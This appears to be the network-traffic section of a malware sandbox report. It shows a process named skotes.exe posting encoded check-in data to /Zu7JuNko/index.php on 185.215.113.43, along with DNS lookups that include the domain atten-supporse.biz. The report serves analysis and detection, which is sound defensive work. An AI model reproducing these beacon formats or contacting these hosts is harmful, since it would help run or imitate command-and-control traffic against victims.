                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:56.841212988 CET4993980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:56.841334105 CET8049923185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:56.841376066 CET4993980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:56.841384888 CET4992380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:56.960663080 CET8049939185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:58.172768116 CET8049939185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:58.172818899 CET4993980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:58.911878109 CET4989680192.168.2.434.107.221.82
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.101018906 CET4986880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.821274042 CET4993980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.821566105 CET4994980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.940814972 CET8049949185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.940829039 CET8049939185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.940898895 CET4993980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.940906048 CET4994980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.948918104 CET4994980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.008481026 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.008495092 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.008554935 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.008846998 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.008857012 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.068253994 CET8049949185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.317770958 CET8049949185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.319050074 CET4994980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.749599934 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.750674009 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.750694990 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.751538038 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.751599073 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.752409935 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.752461910 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.796207905 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.796216965 CET44349951142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.849558115 CET49951443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.108110905 CET49969443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.108128071 CET4434996935.190.72.216192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.108438015 CET49969443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.109909058 CET49969443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.109920979 CET4434996935.190.72.216192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.141043901 CET49969443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 9, 2024 23:08:18.283502102 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.651407957 CET5748853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET53574881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.587831020 CET5204653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.900635004 CET53520461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.968075991 CET5130253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:38.212718010 CET53513021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.492753029 CET6130453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.499263048 CET6170953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.631985903 CET5104953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.636679888 CET53617091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.637662888 CET6452053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.769190073 CET53510491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.769925117 CET6082753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.774365902 CET53645201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.776556015 CET5272053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.906683922 CET53608271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.912915945 CET53527201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.335886955 CET6482753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.359155893 CET5477953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.472915888 CET53648271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.473943949 CET6408753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.496565104 CET53547791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.610735893 CET53640871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.611263990 CET5171353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.979048967 CET53517131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.115263939 CET5709753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.115712881 CET6404553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.253190994 CET53640451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.253226995 CET53570971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.254421949 CET6250553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.254421949 CET5704053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.391423941 CET53625051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.392110109 CET53570401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.837243080 CET5166253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.837683916 CET5679653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.858661890 CET6350353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.977231979 CET53516621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.977242947 CET53567961.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.996702909 CET53635031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.999202967 CET5994553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.136001110 CET53599451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.147722006 CET5521453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.162071943 CET5637553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.285718918 CET53552141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:55.590099096 CET53515261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:55.612701893 CET53552021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:58.822288036 CET53573481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.867408991 CET5813253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.867831945 CET6337653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.004831076 CET53581321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.007638931 CET53633761.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.900276899 CET6354753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.900389910 CET5407353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.108361006 CET5847653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.256952047 CET53584761.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.332451105 CET192.168.2.41.1.1.1c2c1(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.651407957 CET192.168.2.41.1.1.10xd885Standard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.587831020 CET192.168.2.41.1.1.10xaac7Standard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.968075991 CET192.168.2.41.1.1.10x3f48Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.492753029 CET192.168.2.41.1.1.10xafdcStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.499263048 CET192.168.2.41.1.1.10x76cdStandard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.631985903 CET192.168.2.41.1.1.10xa9c4Standard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.637662888 CET192.168.2.41.1.1.10x1757Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.769925117 CET192.168.2.41.1.1.10xa142Standard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.776556015 CET192.168.2.41.1.1.10x92dcStandard query (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.335886955 CET192.168.2.41.1.1.10xeff9Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.359155893 CET192.168.2.41.1.1.10xf3a0Standard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.473943949 CET192.168.2.41.1.1.10x80a8Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.611263990 CET192.168.2.41.1.1.10x1ea4Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.115263939 CET192.168.2.41.1.1.10xc4e0Standard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.115712881 CET192.168.2.41.1.1.10xf0d5Standard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.254421949 CET192.168.2.41.1.1.10xed98Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.254421949 CET192.168.2.41.1.1.10x7e8dStandard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.837243080 CET192.168.2.41.1.1.10x24e2Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.837683916 CET192.168.2.41.1.1.10xa4b9Standard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.858661890 CET192.168.2.41.1.1.10xe942Standard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.999202967 CET192.168.2.41.1.1.10x9516Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.147722006 CET192.168.2.41.1.1.10x97f9Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.162071943 CET192.168.2.41.1.1.10x425aStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.867408991 CET192.168.2.41.1.1.10xe508Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:59.867831945 CET192.168.2.41.1.1.10x54d0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.900276899 CET192.168.2.41.1.1.10xce7aStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:01.900389910 CET192.168.2.41.1.1.10xaa78Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:03.108361006 CET192.168.2.41.1.1.10xd649Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:14.889875889 CET1.1.1.1192.168.2.40xd885No error (0)atten-supporse.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.487025023 CET1.1.1.1192.168.2.40xcdb6No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:37.900635004 CET1.1.1.1192.168.2.40xaac7No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.630951881 CET1.1.1.1192.168.2.40xafdcNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.630951881 CET1.1.1.1192.168.2.40xafdcNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.636679888 CET1.1.1.1192.168.2.40x76cdNo error (0)youtube.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.769190073 CET1.1.1.1192.168.2.40xa9c4No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.774365902 CET1.1.1.1192.168.2.40x1757No error (0)youtube.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.906683922 CET1.1.1.1192.168.2.40xa142No error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.912915945 CET1.1.1.1192.168.2.40x92dcNo error (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.472915888 CET1.1.1.1192.168.2.40xeff9No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.496565104 CET1.1.1.1192.168.2.40xf3a0No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.496565104 CET1.1.1.1192.168.2.40xf3a0No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.538000107 CET1.1.1.1192.168.2.40x79d4No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.538000107 CET1.1.1.1192.168.2.40x79d4No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.610735893 CET1.1.1.1192.168.2.40x80a8No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.253190994 CET1.1.1.1192.168.2.40xf0d5No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.253226995 CET1.1.1.1192.168.2.40xc4e0No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.977231979 CET1.1.1.1192.168.2.40x24e2No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.977242947 CET1.1.1.1192.168.2.40xa4b9No error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.977242947 CET1.1.1.1192.168.2.40xa4b9No error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.996702909 CET1.1.1.1192.168.2.40xe942No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.996702909 CET1.1.1.1192.168.2.40xe942No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:43.996702909 CET1.1.1.1192.168.2.40xe942No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.136001110 CET1.1.1.1192.168.2.40x9516No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.285718918 CET1.1.1.1192.168.2.40x97f9No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.300718069 CET1.1.1.1192.168.2.40x425aNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:44.300718069 CET1.1.1.1192.168.2.40x425aNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.004831076 CET1.1.1.1192.168.2.40xe508No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:00.007638931 CET1.1.1.1192.168.2.40x54d0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.037494898 CET1.1.1.1192.168.2.40xce7aNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.037494898 CET1.1.1.1192.168.2.40xce7aNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.037494898 CET1.1.1.1192.168.2.40xce7aNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.037494898 CET1.1.1.1192.168.2.40xce7aNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.317070961 CET1.1.1.1192.168.2.40x5da4No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.332376003 CET1.1.1.1192.168.2.40xaa78No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.332376003 CET1.1.1.1192.168.2.40xaa78No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.555809975 CET1.1.1.1192.168.2.40x8751No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.555809975 CET1.1.1.1192.168.2.40x8751No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 9, 2024 23:10:02.555809975 CET1.1.1.1192.168.2.40x8751No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              • atten-supporse.biz
                                                                                                                                                                                                                                                              • 185.215.113.43
                                                                                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                                                                                              • detectportal.firefox.com
                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449758185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:04.410979986 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:05.760262012 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:05 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449764185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:07.397635937 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:08.742427111 CET558INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:08 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
